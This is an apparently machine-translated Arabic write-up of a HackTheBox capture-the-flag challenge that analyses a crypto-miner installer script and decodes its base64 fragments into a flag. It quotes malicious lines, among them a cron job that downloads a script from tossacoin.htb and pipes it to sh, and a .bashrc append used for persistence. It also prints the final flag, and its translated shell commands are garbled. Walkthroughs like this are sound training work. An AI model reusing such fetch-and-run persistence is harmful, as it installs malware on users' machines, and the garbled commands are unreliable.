وصف
في السباق على Vitalium على المريخ، لجأ مجلس Arodor الشرير إلى إجراءات يائسة، حيث احتاج إلى أموال لمحاولات التعدين الخاصة بهم. لقد ابتكروا شبكة روبوت مصممة خصيصًا لاستخراج العملات المشفرة سرًا. لقد عثرنا على عينة من أداة تثبيت عامل منجم Arodor على الخادم الخاص بنا. وإدراكا لخطورة الوضع، بدأنا تحقيقا شاملا. بوجودك كقائد لها، تحتاج إلى كشف الأعمال الداخلية لآلية التثبيت. كان هذا الاكتشاف بمثابة نقطة تحول، حيث كشف عن مدى يأس أرودور. ومع ذلك، استمرت المعركة من أجل فيتاليوم، مما يحثنا على البقاء يقظين وتكييف دفاعاتنا السيبرانية لمواجهة التهديدات المستقبلية.
الدورة العملية الكاملة لاختبار اختراق تطبيقات الويب
يُظهر التحدي نص bash طويل جدًا والذي يحتوي على بعض السلاسل المشفرة بـ base64 مثل تلك الموجودة أدناه
عنوان url المحلي =”http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg==”
dest=$(صدى “X3QwX200cnN9Cg==”|base64 -d)
صدى "ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==" | base64 -d >> /home/$USER/.bashrc
صدى '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'
كل ما يتعين علينا فعله هو فك تشفير تلك السلاسل باستخدام Base64 وجمع الأجزاء التي تشكل العلم النهائي.
$ صدى cGFydDI9Il90aDMxcl93NHkiCg== | base64-د
$ صدى “X3QwX200cnN9Cg==”|base64 -d
$ صدى “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64-د
$ صدى -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d
العلم النهائي
HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}
قائمة تشغيل مقاطع فيديو HackTheBox